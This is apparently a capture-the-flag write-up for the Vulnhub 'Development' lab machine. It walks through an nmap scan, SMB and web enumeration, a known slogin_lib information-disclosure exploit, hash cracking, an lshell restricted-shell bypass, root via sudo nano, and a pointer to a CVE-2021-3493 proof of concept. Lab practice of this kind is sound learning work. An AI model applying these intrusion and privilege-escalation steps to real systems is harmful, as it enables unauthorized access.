# Vulnhub-Development ## NMAP ```bash nmap -sC -sV 192.168.1.6 Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-15 11:28 PKT Nmap scan report for 192.168.1.6 Host is up (0.041s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 79:07:2b:2c:2c:4e:14:0a:e7:b3:63:46:c6:b3:ad:16 (RSA) |_ 256 24:6b:85:e3:ab:90:5c:ec:d5:83:49:54:cd:98:31:95 (ED25519) 113/tcp open ident? |_auth-owners: oident 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |_auth-owners: root 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) |_auth-owners: root 8080/tcp open http-proxy IIS 6.0 ``` ## PORT 139/445 (SMB) We can see a share named `access`, let's see if we can access this as an anonymous user Access is denied so , I ran `eum4-linux-ng` and it found some users on the machine ## PORT 8080 On port we see an html giving us a hint to look at `html_pages` Here we can see a number of pages so let's go through each of these pages one by one ### About.html This page tells that they are creating pofile for `David` ### Config.html This page has nothing ### Default.html This page has something in binary so let's convert and see what it is , I have a feeling it's a rabbit hole : \ Huh ? ### Development.html This page is interesting it says there's a page `hackersecretpage` which contains a link to upload files so let's where that is And again this has nothing but looking at `development.html` source code there's a comment ### DevelopmentSecretPage On clicking the link we can get a page where it says to logout Here I tried logging in with random credentials I got this error , and it mentioned about a file called `slogin_lib.inc.php` , I searched for the file name on google and it straight away told that there's an exploit for it Let's try the RFI exploit I hosted a file on my machine to see if we can view it from there or not It doesn't look it worked so let's try the Sensitive Infomration disclosure We got some hashses let's try to crack them with `crackstation` Let's try to ssh into the machine We are in but something looks odd , it says type `?` for help If we type commands other than these it wil show error So this looks like we are in restricted shell but I came across an error when I typed `id` It seems `lshell.py` is being used so let's do a quick google search on that This is a python script which restrict some commands to be executed on the shell we can forbid or allow any commands we want So that's what was happeing , let's search if there are any bypasses related to lshell https://www.aldeid.com/wiki/Lshell Bingo , we can by pass this easily ,let's give this is a try Reading `work.txt` ``` 1.Tell Patrick that shoutbox is not working. We need to revert to the old method to update David about shoutbox. For new, we will use the old director's landing page. 2.Patrick's start of the third year in this company! 3.Attend the meeting to discuss if password policy should be relooked at. ``` This isn't really helpful , so going back to patrick hash I tried to crack it one more time by going to online site So we have switched to patrick and can see we can escalate to root either using `vim` or `nano` , let's visit GTFOBINS to escalate our shell ### Using Vim ### Using Nano Launch nano as sudo `sudo /bin/nano` , then press `alt+R` Then `alt+X` You'll get the screen to execute commands You got root !!! ## Unintended way to root Recently Ubuntu OverlayFS Local Privesc exploit was found https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3493 So I used that exploit to get root by getting the PoC https://github.com/briskets/CVE-2021-3493/blob/main/exploit.c